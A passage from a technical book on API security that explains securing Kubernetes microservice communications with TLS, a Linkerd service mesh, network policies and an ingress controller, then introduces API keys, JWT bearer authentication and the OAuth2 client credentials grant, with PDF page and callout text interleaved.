You’ve now deployed some APIs to Kubernetes and applied some basic security con-
trols to the pods themselves by adding security annotations and using minimal Docker
base images. These measures make it harder for an attacker to break out of a con-
tainer if they find a vulnerability to exploit. But even if they can’t break out from the
container, they may still be able to cause a lot of damage by observing network traffic
and sending their own messages on the network. For example, by observing commu-
nications between the Natter API and the H2 database they can capture the connec-
tion password and then use this to directly connect to the database, bypassing the API.
In this section, you’ll see how to enable additional network protections to mitigate
against these attacks.
10.3.1 Securing communications with TLS
In a traditional network, you can limit the ability of an attacker to sniff network com-
munications by using network segmentation. Kubernetes clusters are highly dynamic,
with pods and services coming and going as configuration changes, but low-level
network segmentation is a more static approach that is hard to change. For this rea-
son, there is usually no network segmentation of this kind within a Kubernetes cluster
(although there might be between clusters running on the same infrastructure),
allowing an attacker that gains privileged access to observe all network communica-
tions within the cluster by default. They can use credentials discovered from this
snooping to access other systems and increase the scope of the attack.
DEFINITION
Network segmentation refers to using switches, routers, and firewalls
to divide a network into separate segments (also known as collision domains). An
Reject any request
that doesn’t match
one of the set.
369
Securing microservice communications
attacker can then only observe network traffic within the same network seg-
ment and not traffic in other segments.
Although there are approaches that provide some of the benefits of segmentation
within a cluster, a better approach is to actively protect all communications using TLS.
Apart from preventing an attacker from snooping on network traffic, TLS also pro-
tects against a range of attacks at the network level, such as the DNS rebind attacks
mentioned in section 10.2.8. The certificate-based authentication built into TLS pro-
tects against spoofing attacks such as DNS cache poisoning or ARP spoofing, which rely on
the lack of authentication in low-level protocols. These attacks are prevented by fire-
walls, but if an attacker is inside your network (behind the firewall) then they can
often be carried out effectively. Enabling TLS inside your cluster significantly reduces
the ability of an attacker to expand an attack after gaining an initial foothold.
DEFINITION
In a DNS cache poisoning attack, the attacker sends a fake DNS mes-
sage to a DNS server changing the IP address that a hostname resolves to. An
ARP spoofing attack works at a lower level by changing the hardware address
(ethernet MAC address, for example) that an IP address resolves to.
To enable TLS, you’ll need to generate certificates for each service and distribute the cer-
tificates and private keys to each pod that implements that service. The processes
involved in creating and distributing certificates is known as public key infrastructure (PKI).
DEFINITION
A public key infrastructure is a set of procedures and processes for
creating, distributing, managing, and revoking certificates used to authenti-
cate TLS connections.
Running a PKI is complex and error-prone because there are a lot of tasks to consider:
Private keys and certificates have to be distributed to every service in the net-
work and kept secure.
Certificates need to be issued by a private certificate authority (CA), which itself
needs to be secured. In some cases, you may want to have a hierarchy of CAs
with a root CA and one or more intermediate CAs for additional security. Services
which are available to the public must obtain a certificate from a public CA.
Servers must be configured to present a correct certificate chain and clients
must be configured to trust your root CA.
Certificates must be revoked when a service is decommissioned or if you suspect
a private key has been compromised. Certificate revocation is done by publish-
ing and distributing certificate revocation lists (CRLs) or running an online certifi-
cate status protocol (OCSP) service.
Certificates must be automatically renewed periodically to prevent them from
expiring. Because revocation involves blocklisting a certificate until it expires,
short expiry times are preferred to prevent CRLs becoming too large. Ideally,
certificate renewal should be completely automated.
370
CHAPTER 10
Microservice APIs in Kubernetes
10.3.2 Using a service mesh for TLS
In a highly dynamic environment like Kubernetes, it is not advisable to attempt to run
a PKI manually. There are a variety of tools available to help run a PKI for you. For
example, Cloudflare’s PKI toolkit (https://cfssl.org) and Hashicorp Vault (http://
mng.bz/nzrg) can both be used to automate most aspects of running a PKI. These
general-purpose tools still require a significant amount of effort to integrate into a
Kubernetes environment. An alternative that is becoming more popular in recent years
is to use a service mesh such as Istio (https://istio.io) or Linkerd (https://linkerd.io) to
handle TLS between services in your cluster for you.
DEFINITION
A service mesh is a set of components that secure communications
between pods in a cluster using proxy sidecar containers. In addition to secu-
rity benefits, a service mesh provides other useful functions such as load bal-
ancing, monitoring, logging, and automatic request retries.
A service mesh works by installing lightweight proxies as sidecar containers into
every pod in your network, as shown in figure 10.6. These proxies intercept all net-
work requests coming into the pod (acting as a reverse proxy) and all requests going
out of the pod. Because all communications flow through the proxies, they can
Using an intermediate CA
Directly issuing certificates from the root CA trusted by all your microservices is sim-
ple, but in a production environment, you’ll want to automate issuing certificates.
This means that the CA needs to be an online service responding to requests for new
certificates. Any online service can potentially be compromised, and if this is the root
of trust for all TLS certificates in your cluster (or many clusters), then you’d have no
choice in this case but to rebuild the cluster from scratch. To improve the security of
your clusters, you can instead keep your root CA keys offline and only use them to
periodically sign an intermediate CA certificate. This intermediate CA is then used to
issue certificates to individual microservices. If the intermediate CA is ever compro-
mised, you can use the root CA to revoke its certificate and issue a new one. The root
CA certificate can then be very long-lived, while intermediate CA certificates are
changed regularly.
To get this to work, each service in the cluster must be configured to send the inter-
mediate CA certificate to the client along with its own certificate, so that the client
can construct a valid certificate chain from the service certificate back to the trusted
root CA.
If you need to run multiple clusters, you can also use a separate intermediate CA for
each cluster and use name constraints (http://mng.bz/oR8r) in the intermediate CA
certificate to restrict which names it can issue certificates for (but not all clients sup-
port name constraints). Sharing a common root CA allows clusters to communicate
with each other easily, while the separate intermediate CAs reduce the scope if a
compromise occurs.
371
Securing microservice communications
transparently initiate and terminate TLS, ensuring that communications across the
network are secure while the individual microservices use normal unencrypted mes-
sages. For example, a client can make a normal HTTP request to a REST API and
the client’s service mesh proxy (running inside the same pod on the same machine)
will transparently upgrade this to HTTPS. The proxy at the receiver will handle the
TLS connection and forward the plain HTTP request to the target service. To make
this work, the service mesh runs a central CA service that distributes certificates to
the proxies. Because the service mesh is aware of Kubernetes service metadata, it
automatically generates correct certificates for each service and can periodically
reissue them.2
To enable a service mesh, you need to install the service mesh control plane compo-
nents such as the CA into your cluster. Typically, these will run in their own Kuberne-
tes namespace. In many cases, enabling TLS is then simply a case of adding some
annotations to the deployment YAML files. The service mesh will then automatically
2 At the time of writing, most service meshes don’t support certificate revocation, so you should use short-lived
certificates and avoid relying on this as your only authentication mechanism.
Pod
Pod
App container
Service mesh
control plane
In a service mesh, all service communication
is redirected through proxies running as
sidecar containers inside each pod.
A CA running in the control
plane distributes certificates
to the proxies.
All communications are
upgraded to use TLS
automatically.
HTTP
HTTP
HTTPS
Communications inside
the pod are unencrypted.
App container
Certificate
authority
Service mesh
proxy
Service mesh
proxy
Figure 10.6
In a service mesh, a proxy is injected into each pod as a sidecar
container. All requests to and from the other containers in the pod are redirected
through the proxy. The proxy upgrades communications to use TLS using
certificates it obtains from a CA running in the service mesh control plane.
372
CHAPTER 10
Microservice APIs in Kubernetes
inject the proxy sidecar container when your pods are started and configure them
with TLS certificates.
In this section, you’ll install the Linkerd service mesh and enable TLS between the
Natter API, its database, and the link-preview service, so that all communications are
secured within the network. Linkerd has fewer features than Istio, but is much simpler
to deploy and configure, which is why I’ve chosen it for the examples in this book.
From a security perspective, the relative simplicity of Linkerd reduces the opportunity
for vulnerabilities to be introduced into your cluster.
DEFINITION
The control plane of a service mesh is the set of components respon-
sible for configuring, managing, and monitoring the proxies. The proxies
themselves and the services they protect are known as the data plane.
INSTALLING LINKERD
To install Linkerd, you first need to install the linkerd command-line interface (CLI),
which will be used to configure and control the service mesh. If you have Homebrew
installed on a Mac or Linux box, then you can simply run the following command:
brew install linkerd
On other platforms it can be downloaded and installed from https://github.com/
linkerd/linkerd2/releases/. Once you’ve installed the CLI, you can run pre-installation
checks to ensure that your Kubernetes cluster is suitable for running the service mesh
by running:
linkerd check --pre
If you’ve followed the instructions for installing Minikube in this chapter, then this
will all succeed. You can then install the control plane components by running the fol-
lowing command:
linkerd install | kubectl apply -f -
Finally, run linkerd check again (without the --pre argument) to check the progress
of the installation and see when all the components are up and running. This may
take a few minutes as it downloads the container images.
To enable the service mesh for the Natter namespace, edit the namespace YAML
file to add the linkerd annotation, as shown in listing 10.18. This single annotation
will ensure that all pods in the namespace have Linkerd sidecar proxies injected the
next time they are restarted.
apiVersion: v1
kind: Namespace
metadata:
name: natter-api
Listing 10.18
Enabling Linkerd
373
Securing microservice communications
labels:
name: natter-api
annotations:
linkerd.io/inject: enabled
Run the following command to update the namespace definition:
kubectl apply -f kubernetes/natter-namespace.yaml
You can force a restart of each deployment in the namespace by running the following
commands:
kubectl rollout restart deployment \
natter-database-deployment -n natter-api
kubectl rollout restart deployment \
link-preview-deployment -n natter-api
kubectl rollout restart deployment \
natter-api-deployment -n natter-api
For HTTP APIs, such as the Natter API itself and the link-preview microservice, this is
all that is required to upgrade those services to HTTPS when called from other ser-
vices within the service mesh. You can verify this by using the Linkerd tap utility,
which allows for monitoring network connections in the cluster. You can start tap by
running the following command in a new terminal window:
linkerd tap ns/natter-api
If you then request a message that contains a link to trigger a call to the link-preview
service (using the steps at the end of section 10.2.6), you’ll see the network requests in
the tap output. This shows the initial request from curl without TLS (tls = not_provided
_by_remote), followed by the request to the link-preview service with TLS enabled
(tls = true). Finally, the response is returned to curl without TLS:
req id=2:0 proxy=in src=172.17.0.1:57757 dst=172.17.0.4:4567
➥ tls=not_provided_by_remote :method=GET :authority=
➥ natter-api-service:4567 :path=/spaces/1/messages/1
req id=2:1 proxy=out src=172.17.0.4:53996 dst=172.17.0.16:4567
➥ tls=true :method=GET :authority=natter-link-preview-
➥ service:4567 :path=/preview
rsp id=2:1 proxy=out src=172.17.0.4:53996 dst=172.17.0.16:4567
➥ tls=true :status=200 latency=479094µs
end id=2:1 proxy=out src=172.17.0.4:53996 dst=172.17.0.16:4567
➥ tls=true duration=665µs response-length=330B
rsp id=2:0 proxy=in src=172.17.0.1:57757 dst=172.17.0.4:4567
➥ tls=not_provided_by_remote :status=200 latency=518314µs
end id=2:0 proxy=in src=172.17.0.1:57757
➥ dst=172.17.0.4:4567 tls=not_provided_by_remote duration=169µs
➥ response-length=428B
You’ll enable TLS for requests coming into the network from external clients in sec-
tion 10.4.
Add the linkerd
annotation to enable
the service mesh.
The initial
response from curl
is not using TLS.
The internal
call to the
link-preview
service is
upgraded to
TLS.
The response
back to curl
is also sent
without TLS.
374
CHAPTER 10
Microservice APIs in Kubernetes
The current version of Linkerd can automatically upgrade only HTTP traffic to use
TLS, because it relies on reading the HTTP Host header to determine the target ser-
vice. For other protocols, such as the protocol used by the H2 database, you’d need to
manually set up TLS certificates.
TIP
Some service meshes, such as Istio, can automatically apply TLS to non-
HTTP traffic too.3 This is planned for the 2.7 release of Linkerd. See Istio in
Action by Christian E. Posta (Manning, 2020) if you want to learn more about
Istio and service meshes in general.
Mutual TLS
Linkerd and most other service meshes don’t just supply normal TLS server certifi-
cates, but also client certificates that are used to authenticate the client to the
server. When both sides of a connection authenticate using certificates this is known
as mutual TLS, or mutually authenticated TLS, often abbreviated mTLS. It’s important
to know that mTLS is not by itself any more secure than normal TLS. There are no
attacks against TLS at the transport layer that are prevented by using mTLS. The pur-
pose of a server certificate is to prevent the client connecting to a fake server, and
it does this by authenticating the hostname of the server. If you recall the discussion
of authentication in chapter 3, the server is claiming to be api.example.com and the
server certificate authenticates this claim. Because the server does not initiate con-
nections to the client, it does not need to authenticate anything for the connection to
be secure.
The value of mTLS comes from the ability to use the strongly authenticated client
identity communicated by the client certificate to enforce API authorization policies at
the server. Client certificate authenticate is significantly more secure than many
other authentication mechanisms but is complex to configure and maintain. By han-
dling this for you, a service mesh enables strong API authentication mechanisms. In
chapter 11, you’ll learn how to combine mTLS with OAuth2 to combine strong client
authentication with token-based authorization.
3 Istio has more features that Linkerd but is also more complex to install and configure, which is why I chose
Linkerd for this chapter.
Pop quiz
5
Which of the following are reasons to use an intermediate CA? Select all that apply.
a
To have longer certificate chains
b
To keep your operations teams busy
c
To use smaller key sizes, which are faster
d
So that the root CA key can be kept offline
e
To allow revocation in case the CA key is compromised
375
Securing microservice communications
10.3.3 Locking down network connections
Enabling TLS in the cluster ensures that an attacker can’t modify or eavesdrop on
communications between APIs in your network. But they can still make their own
connections to any service in any namespace in the cluster. For example, if they
compromise an application running in a separate namespace, they can make direct
connections to the H2 database running in the natter-api namespace. This might
allow them to attempt to guess the connection password, or to scan services in the net-
work for vulnerabilities to exploit. If they find a vulnerability, they can then compro-
mise that service and find new attack possibilities. This process of moving from service
to service inside your network after an initial compromise is known as lateral movement
and is a common tactic.
DEFINITION
Lateral movement is the process of an attacker moving from system
to system within your network after an initial compromise. Each new system
compromised provides new opportunities to carry out further attacks, expand-
ing the systems under the attacker’s control. You can learn more about com-
mon attack tactics through frameworks such as MITRE ATT&CK (https://attack
.mitre.org).
To make it harder for an attacker to carry out lateral movement, you can apply network
policies in Kubernetes that restrict which pods can connect to which other pods in a
network. A network policy allows you to state which pods are expected to connect to
each other and Kubernetes will then enforce these rules to prevent access from other
pods. You can define both ingress rules that determine what network traffic is allowed
into a pod, and egress rules that say which destinations a pod can make outgoing con-
nections to.
DEFINITION
A Kubernetes network policy (http://mng.bz/v94J) defines what
network traffic is allowed into and out of a set of pods. Traffic coming into a
pod is known as ingress, while outgoing traffic from the pod to other hosts is
known as egress.
Because Minikube does not support network policies currently, you won’t be able to
apply and test any network policies created in this chapter. Listing 10.19 shows an
example network policy that you could use to lock down network connections to and
from the H2 database pod. Apart from the usual name and namespace declarations, a
network policy consists of the following parts:
A podSelector that describes which pods in the namespace the policy will apply
to. If no policies select a pod, then it will be allowed all ingress and egress traffic
6
True or False: A service mesh can automatically upgrade network requests to
use TLS.
The answers are at the end of the chapter.
376
CHAPTER 10
Microservice APIs in Kubernetes
by default, but if any do then it is only allowed traffic that matches at least one
of the rules defined. The podSelector: {} syntax can be used to select all pods
in the namespace.
A set of policy types defined in this policy, out of the possible values Ingress
and Egress. If only ingress policies are applicable to a pod then Kubernetes will
still permit all egress traffic from that pod by default, and vice versa. It’s best to
explicitly define both Ingress and Egress policy types for all pods in a name-
space to avoid confusion.
An ingress section that defines allowlist ingress rules. Each ingress rule has a
from section that says which other pods, namespaces, or IP address ranges can
make network connections to the pods in this policy. It also has a ports section
that defines which TCP and UDP ports those clients can connect to.
An egress section that defines the allowlist egress rules. Like the ingress rules,
egress rules consist of a to section defining the allowed destinations and a
ports section defining the allowed target ports.
TIP
Network policies apply to only new connections being established. If an
incoming connection is permitted by the ingress policy rules, then any outgo-
ing traffic related to that connection will be permitted without defining indi-
vidual egress rules for each possible client.
Listing 10.19 defines a complete network policy for the H2 database. For ingress, it
defines a rule that allows connections to TCP port 9092 from pods with the label app:
natter-api. This allows the main Natter API pods to talk to the database. Because no
other ingress rules are defined, no other incoming connections will be accepted. The
policy in listing 10.19 also lists the Egress policy type but doesn’t define any egress
rules, which means that all outbound connections from the database pods will be
blocked. This listing is to illustrate how network policies work; you don’t need to save
the file anywhere.
NOTE
The allowed ingress or egress traffic is the union of all policies that
select a pod. For example, if you add a second policy that permits the data-
base pods to make egress connections to google.com then this will be allowed
even though the first policy doesn’t allow this. You must examine all policies
in a namespace together to determine what is allowed.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: database-network-policy
namespace: natter-api
spec:
podSelector:
matchLabels:
app: natter-database
Listing 10.19
Token database network policy
Apply the policy to pods with the
app=natter-database label.
377
Securing incoming requests
policyTypes:
- Ingress
- Egress
ingress:
- from:
- podSelector:
matchLabels:
app: natter-api
ports:
- protocol: TCP
port: 9092
You can create the policy and apply it to the cluster using kubectl apply, but on Mini-
kube it will have no effect because Minikube’s default networking components are not
able to enforce policies. Most hosted Kubernetes services, such as those provided by Goo-
gle, Amazon, and Microsoft, do support enforcing network policies. Consult the docu-
mentation for your cloud provider to see how to enable this. For self-hosted Kubernetes
clusters, you can install a network plugin such as Calico (https://www.projectcalico.org)
or Cilium (https://cilium.readthedocs.io/en/v1.6/).
As an alternative to network policies, Istio supports defining network authorization
rules in terms of the service identities contained in the client certificates it uses for
mTLS within the service mesh. These policies go beyond what is supported by net-
work policies and can control access based on HTTP methods and paths. For exam-
ple, you can allow one service to only make GET requests to another service. See
http://mng.bz/4BKa for more details. If you have a dedicated security team, then ser-
vice mesh authorization allows them to enforce consistent security controls across the
cluster, allowing API development teams to concentrate on their unique security
requirements.
WARNING
Although service mesh authorization policies can significantly harden
your network, they are not a replacement for API authorization mechanisms.
For example, service mesh authorization provides little protection against the
SSRF attacks discussed in section 10.2.7 because the malicious requests will be
transparently authenticated by the proxies just like legitimate requests.
10.4
Securing incoming requests
So far, you’ve only secured communications between microservice APIs within the
cluster. The Natter API can also be called by clients outside the cluster, which you’ve
been doing with curl. To secure requests into the cluster, you can enable an ingress
controller that will receive all requests arriving from external sources as shown in fig-
ure 10.7. An ingress controller is a reverse proxy or load balancer, and can be config-
ured to perform TLS termination, rate-limiting, audit logging, and other basic security
controls. Requests that pass these checks are then forwarded on to the services within
the network. Because the ingress controller itself runs within the network, it can be
included in the Linkerd service mesh, ensuring that the forwarded requests are auto-
matically upgraded to HTTPS.
The policy applies to both
incoming (ingress) and
outgoing (egress) traffic.
Allow ingress only from pods with
the label app=natter-api-service
in the same namespace.
Allow ingress only
to TCP port 9092.
378
CHAPTER 10
Microservice APIs in Kubernetes
DEFINITION
A Kubernetes ingress controller is a reverse proxy or load balancer
that handles requests coming into the network from external clients. An
ingress controller also often functions as an API gateway, providing a unified
API for multiple services within the cluster.
NOTE
An ingress controller usually handles incoming requests for an entire
Kubernetes cluster. Enabling or disabling an ingress controller may therefore
have implications for all pods running in all namespaces in that cluster.
To enable an ingress controller in Minikube, you need to enable the ingress add-on.
Before you do that, if you want to enable mTLS between the ingress and your services
you can annotate the kube-system namespace to ensure that the new ingress pod that
gets created will be part of the Linkerd service mesh. Run the following two com-
mands to launch the ingress controller inside the service mesh. First run
kubectl annotate namespace kube-system linkerd.io/inject=enabled
and then run:
minikube addons enable ingress
This will start a pod within the kube-system namespace running the NGINX web
server (https://nginx.org), which is configured to act as a reverse proxy. The ingress
controller will take a few minutes to start. You can check its progress by running
the command:
kubectl get pods -n kube-system --watch
Pod
Pod
Ingress
controller
An ingress controller acts as a gateway for external
clients. The ingress routes requests to internal services
and can terminate TLS and apply basic rate-limiting.
Figure 10.7
An ingress controller acts as a gateway for all requests from
external clients. The ingress can perform tasks of a reverse proxy or load
balancer, such as terminating TLS connections, performing rate-limiting,
and adding audit logging.
379
Securing incoming requests
After you have enabled the ingress controller, you need to tell it how to route requests
to the services in your namespace. This is done by creating a new YAML configuration
file with kind Ingress. This configuration file can define how HTTP requests are
mapped to services within the namespace, and you can also enable TLS, rate-limiting,
and other features (see http://mng.bz/Qxqw for a list of features that can be enabled).
Listing 10.20 shows the configuration for the Natter ingress controller. To allow
Linkerd to automatically apply mTLS to connections between the ingress controller and
the backend services, you need to rewrite the Host header from the external value (such
as api.natter.local) to the internal name used by your service. This can be achieved by
adding the nginx.ingress.kubernetes.io/upstream-vhost annotation. The NGINX
configuration defines variables for the service name, port, and namespace based on the
configuration so you can use these in the definition. Create a new file named natter-
ingress.yaml in the kubernetes folder with the contents of the listing, but don’t apply it
just yet. There’s one more step you need before you can enable TLS.
TIP
If you’re not using a service mesh, your ingress controller may support
establishing its own TLS connections to backend services or proxying TLS
connections straight through to those services (known as SSL passthrough).
Istio includes an alternative ingress controller, Istio Gateway, that knows how
to connect to the service mesh.
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: api-ingress
namespace: natter-api
annotations:
nginx.ingress.kubernetes.io/upstream-vhost:
"$service_name.$namespace.svc.cluster.local:$service_port"
spec:
tls:
- hosts:
- api.natter.local
secretName: natter-tls
rules:
- host: api.natter.local
http:
paths:
- backend:
serviceName: natter-api-service
servicePort: 4567
To allow the ingress controller to terminate TLS requests from external clients, it
needs to be configured with a TLS certificate and private key. For development, you
can create a certificate with the mkcert utility that you used in chapter 3:
mkcert api.natter.local
Listing 10.20
Configuring ingress
Define the Ingress
resource.
Give the ingress rules a name
in the natter-api namespace.
Rewrite the Host
header using the
upstream-vhost
annotation.
Enable TLS by providing
a certificate and key.
Define a route to direct
all HTTP requests to the
natter-api-service.
380
CHAPTER 10
Microservice APIs in Kubernetes
This will spit out a certificate and private key in the current directory as two files with
the .pem extension. PEM stands for Privacy Enhanced Mail and is a common file for-
mat for keys and certificates. This is also the format that the ingress controller needs.
To make the key and certificate available to the ingress, you need to create a Kubernetes
secret to hold them.
DEFINITION
Kubernetes secrets are a standard mechanism for distributing pass-
words, keys, and other credentials to pods running in a cluster. The secrets
are stored in a central database and distributed to pods as either filesystem
mounts or environment variables. You’ll learn more about Kubernetes secrets
in chapter 11.
To make the certificate available to the ingress, run the following command:
kubectl create secret tls natter-tls -n natter-api \
--key=api.natter.local-key.pem --cert=api.natter.local.pem
This will create a TLS secret with the name natter-tls in the natter-api name-
space with the given key and certificate files. The ingress controller will be able to
find this secret because of the secretName configuration option in the ingress config-
uration file. You can now create the ingress configuration to expose the Natter API to
external clients:
kubectl apply -f kubernetes/natter-ingress.yaml
You’ll now be able to make direct HTTPS calls to the API:
$ curl https://api.natter.local/users \
-H 'Content-Type: application/json' \
-d '{"username":"abcde","password":"password"}'
{"username":"abcde"}
If you check the status of requests using Linkerd’s tap utility, you’ll see that requests
from the ingress controller are protected with mTLS:
$ linkerd tap ns/natter-api
req id=4:2 proxy=in src=172.17.0.16:43358 dst=172.17.0.14:4567
➥ tls=true :method=POST :authority=natter-api-service.natter-
➥ api.svc.cluster.local:4567 :path=/users
rsp id=4:2 proxy=in src=172.17.0.16:43358 dst=172.17.0.14:4567
➥ tls=true :status=201 latency=322728µs
You now have TLS from clients to the ingress controller and mTLS between the ingress
controller and backend services, and between all microservices on the backend.4
4 The exception is the H2 database as Linkerd can’t automatically apply mTLS to this connection. This should
be fixed in the 2.7 release of Linkerd.
381
Summary
TIP
In a production system you can use cert-manager (https://docs.cert-
manager.io/en/latest/) to automatically obtain certificates from a public
CA such as Let’s Encrypt or from a private organizational CA such as Hashi-
corp Vault.
Answers to pop quiz questions
1
c. Pods are made up of one or more containers.
2
False. A sidecar container runs alongside the main container. An init container
is the name for a container that runs before the main container.
3
a, b, c, d, and f are all good ways to improve the security of containers.
4
e. You should prefer strict allowlisting of URLs whenever possible.
5
d and e. Keeping the root CA key offline reduces the risk of compromise and
allows you to revoke and rotate intermediate CA keys without rebuilding the
whole cluster.
6
True. A service mesh can automatically handle most aspects of applying TLS to
your network requests.
7
a, b, c, and d.
Summary
Kubernetes is a popular way to manage a collection of microservices running
on a shared cluster. Microservices are deployed as pods, which are groups of
related Linux containers. Pods are scheduled across nodes, which are physical
or virtual machines that make up the cluster. A service is implemented by one
or more pod replicas.
A security context can be applied to pod deployments to ensure that the con-
tainer runs as a non-root user with limited privileges. A pod security policy can be
applied to the cluster to enforce that no container is allowed elevated privileges.
When an API makes network requests to a URL provided by a user, you should
ensure that you validate the URL to prevent SSRF attacks. Strict allowlisting of
permitted URLs should be preferred to blocklisting. Ensure that redirects are
Pop quiz
7
Which of the following are tasks are typically performed by an ingress controller?
a
Rate-limiting
b
Audit logging
c
Load balancing
d
Terminating TLS requests
e
Implementing business logic
f
Securing database connections
The answer is at the end of the chapter.
382
CHAPTER 10
Microservice APIs in Kubernetes
also validated. Protect your APIs from DNS rebinding attacks by strictly validat-
ing the Host header and enabling TLS.
Enabling TLS for all internal service communications protects against a variety
of attacks and limits the damage if an attacker breaches your network. A service
mesh such as Linkerd or Istio can be used to automatically manage mTLS con-
nections between all services.
Kubernetes network policies can be used to lock down allowed network com-
munications, making it harder for an attacker to perform lateral movement
inside your network. Istio authorization policies can perform the same task
based on service identities and may be easier to configure.
A Kubernetes ingress controller can be used to allow connections from external
clients and apply consistent TLS and rate-limiting options. By adding the ingress
controller to the service mesh you can ensure connections from the ingress to
backend services are also protected with mTLS.
383
Securing
service-to-service APIs
In previous chapters, authentication has been used to determine which user is
accessing an API and what they can do. It’s increasingly common for services to talk
to other services without a user being involved at all. These service-to-service API
calls can occur within a single organization, such as between microservices, or
between organizations when an API is exposed to allow other businesses to access
data or services. For example, an online retailer might provide an API for resellers
to search products and place orders on behalf of customers. In both cases, it is the
API client that needs to be authenticated rather than an end user. Sometimes this is
needed for billing or to apply limits according to a service contract, but it’s also
essential for security when sensitive data or operations may be performed. Services
are often granted wider access than individual users, so stronger protections may
This chapter covers
Authenticating services with API keys and JWTs
Using OAuth2 for authorizing service-to-service
API calls
TLS client certificate authentication and
mutual TLS
Credential and key management for services
Making service calls in response to user requests
384
CHAPTER 11
Securing service-to-service APIs
be required because the damage from compromise of a service account can be
greater than any individual user account. In this chapter, you’ll learn how to authenti-
cate services and additional hardening that can be applied to better protect privileged
accounts, using advanced features of OAuth2.
NOTE
The examples in this chapter require a running Kubernetes installa-
tion configured according to the instructions in appendix B.
11.1
API keys and JWT bearer authentication
One of the most common forms of service authentication is an API key, which is a sim-
ple bearer token that identifies the service client. An API key is very similar to the
tokens you’ve used for user authentication in previous chapters, except that an API
key identifies a service or business rather than a user and usually has a long expiry
time. Typically, a user logs in to a website (known as a developer portal) and generates an
API key that they can then add to their production environment to authenticate API
calls, as shown in figure 11.1.
api.example.com
developers.example.com
client.foo.com
Request access
API key
API key
GET/accounts?api_key=....
A developer requests access to the
API from the developer portal.
The portal generates an API key
that is sent on API requests to
authenticate the client.
Developer
Figure 11.1
To gain access to an API, a representative of the organization
logs into a developer portal and requests an API key. The portal generates the
API key and returns it. The developer then includes the API key as a query
parameter on requests to the API.
385
The OAuth2 client credentials grant
Section 11.5 covers techniques for securely deploying API keys and other credentials.
The API key is added to each request as a request parameter or custom header.
DEFINITION
An API key is a token that identifies a service client rather than a
user. API keys are typically valid for a much longer time than a user token,
often months or years.
Any of the token formats discussed in chapters 5 and 6 are suitable for generating API
keys, with the username replaced by an identifier for the service or business that
API usage should be associated with and the expiry time set to a few months or years
in the future. Permissions or scopes can be used to restrict which API calls can be
called by which clients, and the resources they can read or modify, just as you’ve done
for users in previous chapters—the same techniques apply.
An increasingly common choice is to replace ad hoc API key formats with standard
JSON Web Tokens. In this case, the JWT is generated by the developer portal with
claims describing the client and expiry time, and then either signed or encrypted with
one of the symmetric authenticated encryption schemes described in chapter 6. This
is known as JWT bearer authentication, because the JWT is acting as a pure bearer token:
any client in possession of the JWT can use it to access the APIs it is valid for without
presenting any other credentials. The JWT is usually passed to the API in the Authori-
zation header using the standard Bearer scheme described in chapter 5.
DEFINITION
In JWT bearer authentication, a client gains access to an API by pre-
senting a JWT that has been signed by an issuer that the API trusts.
An advantage of JWTs over simple database tokens or encrypted strings is that you can
use public key signatures to allow a single developer portal to generate tokens that
are accepted by many different APIs. Only the developer portal needs to have access
to the private key used to sign the JWTs, while each API server only needs access to
the public key. Using public key signed JWTs in this way is covered in section 7.4.4,
and the same approach can be used here, with a developer portal taking the place of
the AS.
WARNING
Although using JWTs for client authentication is more secure than
client secrets, a signed JWT is still a bearer credential that can be used by any-
one that captures it until it expires. A malicious or compromised API server
could take the JWT and replay it to other APIs to impersonate the client. Use
expiry, audience, and other standard JWT claims (chapter 6) to reduce the
impact if a JWT is compromised.
11.2
The OAuth2 client credentials grant
Although JWT bearer authentication is appealing due to its apparent simplicity, you
still need to develop the portal for generating JWTs, and you’ll need to consider how
to revoke tokens when a service is retired or a business partnership is terminated. The
need to handle service-to-service API clients was anticipated by the authors of the
386
CHAPTER 11
Securing service-to-service APIs
OAuth2 specifications, and a dedicated grant type was added to support this case: the
client credentials grant. This grant type allows an OAuth2 client to obtain an access
token using its own credentials without a user being involved at all. The access token
issued by the authorization server (AS) can be used just like any other access token,
allowing an existing OAuth2 deployment to be reused for service-to-service API calls.
This allows the AS to be used as the developer portal and all the features of OAuth2,
such as discoverable token revocation and introspection endpoints discussed in chap-
ter 7, to be used for service calls.
WARNING
If an API accepts calls from both end users and service clients, it’s
important to make sure that the API can tell which is which. Otherwise, users
may be able to impersonate service clients or vice versa. The OAuth2 stan-
dards don’t define a single way to distinguish these two cases, so you should
consult the documentation for your AS vendor.
To obtain an access token using the client credentials grant, the client makes a direct
HTTPS request to the token endpoint of the AS, specifying the client_credentials
grant type and the scopes that it requires. The client authenticates itself using its own
credentials. OAuth2 supports a range of different client authentication mechanisms,
and you’ll learn about several of them in this chapter. The simplest authentication
method is known as client_secret_basic, in which the client presents its client ID
and a secret value using HTTP Basic authentication.1 For example, the following curl
command shows how to use the client credentials grant to obtain an access token for a
client with the ID test and secret value password:
$ curl -u test:password \
-d 'grant_type=client_credentials&scope=a+b+c' \
https://as.example.com/access_token
Assuming the credentials are correct, and the client is authorized to obtain access
tokens using this grant and the requested scopes, the response will be like the following:
{
"access_token": "q4TNVUHUe9A9MilKIxZOCIs6fI0",
"scope": "a b c",
"token_type": "Bearer",
"expires_in": 3599
}
NOTE
OAuth2 client secrets are not passwords intended to be remembered
by users. They are usually long random strings of high entropy that are gener-
ated automatically during client registration.
1 OAuth2 Basic authentication requires additional URL-encoding if the client ID or secret contain non-ASCII
characters. See https://tools.ietf.org/html/rfc6749#section-2.3.1 for details.
Send the client ID and secret
using Basic authentication.
Specify the client_
credentials grant.
387
The OAuth2 client credentials grant
The access token can then be used to access APIs just like any other OAuth2 access
token discussed in chapter 7. The API validates the access token in the same way that
it would validate any other access token, either by calling a token introspection end-
point or directly validating the token if it is a JWT or other self-contained format.
TIP
The OAuth2 spec advises AS implementations not to issue a refresh
token when using the client credentials grant. This is because there is little
point in the client using a refresh token when it can obtain a new access token
by using the client credentials grant again.
11.2.1 Service accounts
As discussed in chapter 8, user accounts are often held in a LDAP directory or other
central database, allowing APIs to look up users and determine their roles and permis-
sions. This is usually not the case for OAuth2 clients, which are often stored in an
AS-specific database as in figure 11.2. A consequence of this is that the API can vali-
date the access token but then has no further information about who the client is to
make access control decisions.
One solution to this problem is for the API to make access control decisions purely
based on the scope or other information related to the access token itself. In this case,
access tokens act more like the capability tokens discussed in chapter 9, where the
api.example.com
as.example.com
Clients
User accounts
OAuth2 clients details
are private to the AS
and not shared.
User and service accounts
are in a shared repository,
allowing APIs to query role
and group memberships.
Figure 11.2
An authorization server (AS)
typically stores client details in a private
database, so these details are not accessible to
APIs. A service account lives in the shared user
repository, allowing APIs to look up identity
